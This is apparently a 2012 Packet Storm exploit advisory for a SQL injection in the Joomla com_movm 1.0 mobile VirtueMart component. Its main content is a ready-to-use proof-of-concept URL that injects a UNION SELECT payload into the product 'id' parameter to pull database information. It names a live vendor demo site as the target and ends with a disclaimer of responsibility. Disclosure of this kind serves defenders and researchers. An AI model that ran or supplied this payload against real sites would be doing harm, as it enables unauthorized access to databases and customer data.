Joomla Movm 1.0 SQL Injection

2012-08-01T00:00:00
ID PACKETSTORM:115176
Type packetstorm
Reporter Daniel Barragan
Modified 2012-08-01T00:00:00

Description

                                        
                                            `_______________________________________________________________________________________  
  
Exploit Title: Joomla com_movm SQL Injection  
  
Date: [31-07-2012]  
  
Author: Daniel Barragan "D4NB4R"  
  
Twitter: @D4NB4R  
  
site: http://poisonsecurity.wordpress.com/  
  
Vendor: http://www.movm.net/  
  
Version: 1.0 (Date Added 28 July 2012)  
  
License: Commercial $ 49.99 us  
  
Demo: http://www.movm.net/movm-mobile-virtuemart-site-demo/  
  
Tested on: [Linux(bt5)-Windows(7ultimate)]  
  
  
This component was released 3 days ago.be careful when using this component   
Movm is a joomla extension for mobiles which optimize VirtueMart sites for iphone, android and blackberry.   
It is compatible with Joomla2.5 and VirtueMart 2.0.Have used Jquery mobile, so it gives native effect to Web App.  
This component can be Attacked from a mobile, put the following string in the url field.  
  
p0C  
  
http://www.movm.net/demo/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20  
  
  
  
Im not responsible for which is given  
No me hago responsable del uso que se le de  
_______________________________________________________________________________________  
Daniel Barragan "D4NB4R" 2012   
`